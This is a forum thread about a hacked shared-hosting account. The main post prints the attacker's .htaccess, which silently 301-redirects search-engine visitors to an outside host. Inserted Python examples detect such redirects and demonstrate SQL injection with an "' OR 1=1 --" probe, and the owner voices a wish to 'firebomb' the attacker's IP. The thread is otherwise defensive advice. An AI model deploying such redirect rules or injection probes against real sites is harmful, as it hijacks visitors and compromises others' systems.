Virus on my web server? ( attempt 2)

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • Virus on my web server? ( attempt 2)

    So I have a site hosted with dreamhost. We had it hacked and bad things were inserted in the code, which made our site link to porn.. yay.
    I ended up deleting all the files to the point of the root of the server containing nothing, then uploaded new files, which I typed myself in plain HTML/PHP.
    The issue is that every link I have on the site will again turn into porn links. on the 7th click, the links direct to porn. The link when viewing the source is fine, the source code when re-downloading it from the server is fine too, yet there are still porn links coming up. How could this be?..
    I scanned my local computer with AVG, and it found nothing.. also the porn links only appear on my site, not on other sites, so it must reside there. Dreamhost tech support has gotten back to me once telling me that it was a password exploit ( I have no idea how, but I did change the passwords to the site as soon as we found out).. but did not offer any word on how to get rid of the porn links.
    Another site I host is also available with the same login, and is now tagged by google as a known exploit site. All it now contains is a simple 5 line HTML file, which has no evil in it, and the php picture gallery which dreamhost has a one click install. I updated the gallery and think all old code from it has been deleted.
    Since dreamhost is not getting back to me, I hope someone here has an idea what is going on. I checked for running processes on the server under my username, and it only has bash and ps listed .. I can link to the sites, if anyone here thinks they can pinpoint what is going on .

    thanks
    We have enough youth - What we need is a fountain of smart!


    i7-920, 6GB DDR3-1600, HD4870X2, Dell 27" LCD

  • #2
    well, finally I get somewhere..
    seems what happened was that some @$$ in belarus got in via FTP using my login/password.. no idea how he obtained such.
    once in, he tacked on the <script>'s, which I cannot post here, as everything blocks access for you to see them, on most every .php/.htm file. Those I got rid of easily.. but the main culprit, which I did not spot, was the .htaccess file, which was hiding away in the root of my account
    Code:
    cat .htaccess
    RewriteEngine On
    RewriteCond %{HTTP_REFERER} .*google.* [OR]
    RewriteCond %{HTTP_REFERER} .*ask.* [OR]
    RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
    RewriteCond %{HTTP_REFERER} .*excite.* [OR]
    RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
    RewriteCond %{HTTP_REFERER} .*msn.* [OR]
    RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
    RewriteCond %{HTTP_REFERER} .*aol.* [OR]
    RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
    RewriteCond %{HTTP_REFERER} .*goto.* [OR]
    RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
    RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
    RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
    RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
    RewriteCond %{HTTP_REFERER} .*search.* [OR]
    RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
    RewriteCond %{HTTP_REFERER} .*dogpile.*
    RewriteRule ^(.*)$ http://2k90.cn/in.php [R=301,L]
    why dreamhost support never suggested looking there, until today, is beyond me. their last reply took them 4 days ( blaming holidays)
    I, not being a linux sysadmin, did not know what the .htaccess file was; it was next to other files such as my .bash and such, so I just assumed it was a regular config file, not an "overwrite your web server settings" file. So to any web hosting people out there, remember to check said file if your site is behaving badly.
    Also, if anyone know how to firebomb the ip of the site, which it directs to, I am all ears
    We have enough youth - What we need is a fountain of smart!


    i7-920, 6GB DDR3-1600, HD4870X2, Dell 27" LCD
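    The .htaccess above redirects only visitors arriving from search engines (the site owner, who types the URL directly, never sees it), which is why the source looked clean. The following is an added example, not code from the thread, that flags that pattern in an .htaccess file: a RewriteRule guarded by HTTP_REFERER conditions whose target is a host you do not own. The sample input is constructed from the posted file with the redirect target replaced by a placeholder host.

```python
import re
from urllib.parse import urlparse

# Constructed sample modelled on the .htaccess posted above; the redirect
# target is a placeholder host, not the real one from the thread.
SAMPLE_HTACCESS = """\
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*search.*
RewriteRule ^(.*)$ http://attacker.example/in.php [R=301,L]
# legitimate hotlink protection: referer condition, but no off-site target
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^https?://(www\\.)?example.com/ [NC]
RewriteRule \\.(jpe?g|png)$ - [F]
"""

COND = re.compile(r"^\s*RewriteCond\s+(\S+)\s+(\S+)", re.I)
RULE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?", re.I)

def find_referer_redirects(text, own_hosts):
    """Return [(line_no, target_host, referer_patterns)] for every RewriteRule
    that is guarded by HTTP_REFERER conditions and sends the visitor to a host
    not in own_hosts. RewriteCond lines apply to the next RewriteRule, so they
    are collected until a rule is seen, mirroring mod_rewrite's grouping."""
    findings, pending = [], []
    for line_no, line in enumerate(text.splitlines(), 1):
        cond = COND.match(line)
        if cond:
            if cond.group(1).upper() == "%{HTTP_REFERER}":
                pending.append(cond.group(2))
            continue
        rule = RULE.match(line)
        if not rule:
            continue
        host = urlparse(rule.group(2)).hostname   # None for "-" or a local path
        if pending and host and host.lower() not in own_hosts:
            findings.append((line_no, host, list(pending)))
        pending = []                              # conditions consumed by this rule
    return findings

if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_HTACCESS
    for line_no, host, pats in find_referer_redirects(text, {"example.com"}):
        print("line %d: redirect to %s when referer matches %s" % (line_no, host, pats))
```

Pass the path of the account's .htaccess as the first argument and your own hostnames in place of example.com; a clean file prints nothing.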



    • #3
      Glad you got it solved. All my servers are Windows, but I'll be remembering that one!
      FT.



      • #4
        It actually sounds more like a SQL injection attack vs an FTP hack.

        The script links in the code are the dead giveaway. While SQL Injection attacks are less common with MySQL they are possible.

        Make sure you search your databases for the link/script phrases to make sure it was not an injection attack. If it was you will have to tweak your SQL code to prevent it.

        As for FTP...with regular FTP your username and password are sent in clear text across the internet. If a hacker can gain access to your packets while you are FTP'ing (like through WiFi) then it is very easy to steal FTP information. You should check with Dreamhost to see if there is a secure FTP option if you are worried about your information getting stolen.
        Last edited by Jammrock; 29 December 2009, 17:58.
        “Inside every sane person there’s a madman struggling to get out”
        –The Light Fantastic, Terry Pratchett



        • #5
          The ONLY sure-fire way to prevent sql injection is to use bind variables.
          If you code using bind variables then you can't be sql injected because the input string is not passed to the sql parser/compiler along with the query. It is processed later.

          http://www.metatitan.com/php/16/prot...injection.html



          Last edited by cjolley; 29 December 2009, 15:24. Reason: better link, and another
          Chuck
          Qiuyin's dad



          • #6
            And the obligatory cartoon related to SQL injection seems appropriate here:
            Dream as if you'll live forever. Live as if you'll die tomorrow. (James Dean)



            • #7


              Though, I must add: forget "sanitize input". There are people out there who are smarter than you, or anyone you know. Just use bind variables.
              Chuck
              Qiuyin's dad
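              Posts #5 and #7 both say that bind variables work because the untrusted string is never handed to the SQL parser together with the query text. The following is an added example, not code from the thread, that shows that on a visitor log like the one the original poster describes, using Python's sqlite3 module (its "?" placeholders are the same mechanism as prepared statements in PHP's PDO or mysqli). The table contents and the probe strings are constructed.

```python
import sqlite3

# Constructed visitor log, the kind of table a site that "just logs visitors" keeps.
VISITORS = [("10.0.0.5", "Mozilla/5.0"), ("10.0.0.9", "curl/7.64")]

def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE visits (ip TEXT, user_agent TEXT)")
    con.executemany("INSERT INTO visits VALUES (?, ?)", VISITORS)
    return con

def log_visit_concat(con, ip, user_agent):
    # Vulnerable: the visitor-controlled User-Agent becomes part of the SQL text,
    # so the parser sees whatever quotes and keywords it contains.
    con.execute("INSERT INTO visits VALUES ('%s', '%s')" % (ip, user_agent))

def log_visit_bound(con, ip, user_agent):
    # Bind variables: the statement is parsed first, the values are supplied
    # afterwards and can never change its structure.
    con.execute("INSERT INTO visits VALUES (?, ?)", (ip, user_agent))

def lookup_concat(con, ip):
    return con.execute("SELECT user_agent FROM visits WHERE ip = '%s'" % ip).fetchall()

def lookup_bound(con, ip):
    return con.execute("SELECT user_agent FROM visits WHERE ip = ?", (ip,)).fetchall()

def demo():
    """Run the same untrusted strings through both styles; returns what each did."""
    quoted_ua = "Mozilla/5.0 (X11; O'Reilly build)"  # legitimate value with a quote
    probe = "' OR 1=1 --"                              # constructed lookup probe
    con = make_db()
    try:
        log_visit_concat(con, "10.0.0.1", quoted_ua)
        concat_insert = "stored"
    except sqlite3.OperationalError:
        concat_insert = "syntax error"   # the quote was parsed as SQL, not as data
    log_visit_bound(con, "10.0.0.2", quoted_ua)
    return {
        "concat_insert": concat_insert,
        "bound_insert": lookup_bound(con, "10.0.0.2")[0][0],   # stored verbatim
        "concat_rows": len(lookup_concat(con, probe)),  # probe rewrites WHERE: all rows
        "bound_rows": len(lookup_bound(con, probe)),    # probe is just an ip value: none
    }

if __name__ == "__main__":
    print(demo())
```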



              • #8
                I really don't have much of anything using SQL, mostly just logging visitors, not letting them input stuff. Will a SQL injection somehow give root access to my account?

                On an interesting note. One of our resellers, who we linked to on the site runs his own site on a different host, no logins/passwords are the same, yet his site was attacked just the same. He claims he somehow got it from our site.. I am not sure how that would work

                I did have phpbb and some other toys installed back when I just got the account, which were just sitting there.. I guess it is possible that there was a security issue with those, since I never updated them since I installed them, as I never used/linked to them.. that was 3 years ago :oops:


                I have changed all dreamhost accounts to not allow FTP access, only SFTP, and I will go through any of my code dealing with inserting data in a database to bind the variables.
                We have enough youth - What we need is a fountain of smart!


                i7-920, 6GB DDR3-1600, HD4870X2, Dell 27" LCD
